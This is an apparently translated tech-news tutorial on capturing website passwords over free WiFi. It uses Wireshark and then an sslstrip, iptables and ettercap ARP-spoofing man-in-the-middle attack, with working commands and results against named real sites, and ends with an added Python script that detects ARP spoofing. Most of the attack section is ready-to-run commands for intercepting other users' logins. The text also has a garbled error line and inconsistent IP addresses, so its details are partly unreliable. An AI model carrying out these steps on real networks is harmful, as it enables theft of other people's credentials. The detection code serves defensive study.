
Free WiFi: capturing packets with Wireshark and capturing passwords with sslstrip

2025-01-16 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

This packet-capture experiment came about because of a paragraph of text I wrote.

--------------------------------

He said: "Now when we get somewhere, the first thing we do is ask if there is WiFi." WiFi has become popular nowadays, and people like free WiFi most in public places. But after using it, I didn't realize my QQ had been stolen. This WiFi is bait. The angler set up a trap. We thought we had picked up a bargain, but we didn't know that we were hooked. QQ gets stolen, the mailbox gets browsed, and so on. Free is good, but be careful.

---------------------------------------

1. Capturing a 51cto account and password with Wireshark

Environment setup

Network environment: Gateway: 192.168.199.1;

Test host: 192.168.199.101, ubuntu13.04/wireshark;

Test target: 51cto.com

Steps

a. Install Wireshark on Ubuntu 13.04

sudo apt-get install wireshark

b. Create a wireshark group and add regular users to it, giving them access to Wireshark.

sudo groupadd wireshark    # add the group wireshark

sudo gpasswd -a zozlin wireshark    # add user USER to group GROUP

The requested URL/bin/dumpcap /was not found on this server.

sudo chmod 4755 /usr/bin/dumpcap    # set the setuid bit and execute permission

Error:

Solution: sudo gedit /usr/share/wireshark/init.lua

Change the penultimate line from dofile(DATA_DIR.."console.lua") to --dofile(DATA_DIR.."console.lua"), which comments it out.

c. Run sudo wireshark and select the network interface (tested locally)

Set the display filter

ip.src==192.168.199.100 && http (source address and HTTP protocol)

Focus on POST requests (application/x-www-form-urlencoded)

I first tried the Tianya forum and 163 mail passwords; both are transmitted encrypted over SSL. 51cto, however, turned out to send the account and password in plaintext.

-----------------------------------------

2. Using sslstrip and ettercap to defeat SSL and sniff passwords

Environment setup

Network environment: Gateway: 192.168.199.1;

*** Host: 192.168.199.101, ubuntu13.04/wireshark/sslstrip;

*** Host: 192.168.199.105/103, virtual machine Windows XP, IE6;

Test target: mail.163.com baidu.com tianya.cn

Steps

Download

http://www.thoughtcrime.org/software/sslstrip/

Extract

tar -zxvf sslstrip-0.9.tar.gz

Install sslstrip

python setup.py install

Enable IP forwarding (ip_forward)

echo 1 > /proc/sys/net/ipv4/ip_forward

Redirect packets with iptables: all HTTP traffic is redirected to port 10000 via iptables. sslstrip listens on port 10000 and captures the data we want.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sslstrip -l 10000

ARP spoofing using ettercap

ettercap -T -q -M arp:remote /192.168.199.103/ /192.168.199.1/

Results

mail.163.com, 51cto.com: broken

baidu.com: password is encrypted again

tianya.cn: not broken
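
A client-side check for the ARP spoofing step above, as an added example that is not part of the original article: it parses a Linux ARP cache dump (/proc/net/arp format) and flags a gateway entry whose MAC address is shared with another host or differs from a recorded known-good value. The IP addresses are the article's lab addresses; the MAC addresses, the wlan0 interface, the sample dumps and the function names are constructed for illustration.

```python
# Constructed samples in /proc/net/arp format (MAC addresses are made up).
HEADER = "IP address       HW type     Flags       HW address            Mask     Device\n"
OTHER_HOSTS = (
    "192.168.199.101  0x1  0x2  08:00:27:aa:bb:65  *  wlan0\n"
    "192.168.199.105  0x1  0x2  08:00:27:cc:dd:69  *  wlan0\n"
    "192.168.199.110  0x1  0x0  00:00:00:00:00:00  *  wlan0\n"   # incomplete entry
)
# Poisoned cache: the gateway IP resolves to the MAC of 192.168.199.101.
POISONED = HEADER + "192.168.199.1  0x1  0x2  08:00:27:aa:bb:65  *  wlan0\n" + OTHER_HOSTS
CLEAN = HEADER + "192.168.199.1  0x1  0x2  d4:ee:07:11:22:01  *  wlan0\n" + OTHER_HOSTS


def parse_arp_table(text):
    """Return {ip: mac} for the complete entries of a /proc/net/arp dump."""
    table = {}
    for line in text.splitlines()[1:]:           # skip the header row
        fields = line.split()
        if len(fields) != 6:
            continue
        ip, _hw_type, flags, mac, _mask, _dev = fields
        # Flag bit 0x2 (ATF_COM) marks a completed entry; skip unresolved ones.
        if int(flags, 16) & 0x2 and mac != "00:00:00:00:00:00":
            table[ip] = mac.lower()
    return table


def check_gateway(text, gateway_ip, known_gateway_mac=None):
    """Return a list of findings suggesting the gateway ARP entry is spoofed."""
    table = parse_arp_table(text)
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return ["no complete ARP entry for gateway " + gateway_ip]
    findings = []
    # ARP poisoning maps the gateway IP to the interceptor's MAC, so the same
    # MAC appears for the gateway and for one other host on the LAN.
    sharers = sorted(ip for ip, mac in table.items()
                     if mac == gw_mac and ip != gateway_ip)
    if sharers:
        findings.append(f"gateway {gateway_ip} shares MAC {gw_mac} with {', '.join(sharers)}")
    if known_gateway_mac and gw_mac != known_gateway_mac.lower():
        findings.append(f"gateway MAC is {gw_mac}, expected {known_gateway_mac.lower()}")
    return findings


if __name__ == "__main__":
    for name, dump in (("poisoned", POISONED), ("clean", CLEAN)):
        print(name, check_gateway(dump, "192.168.199.1", "d4:ee:07:11:22:01") or "ok")
```

On a real Linux client, pass the contents of /proc/net/arp as the first argument and the gateway MAC recorded on a trusted connection as the third.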
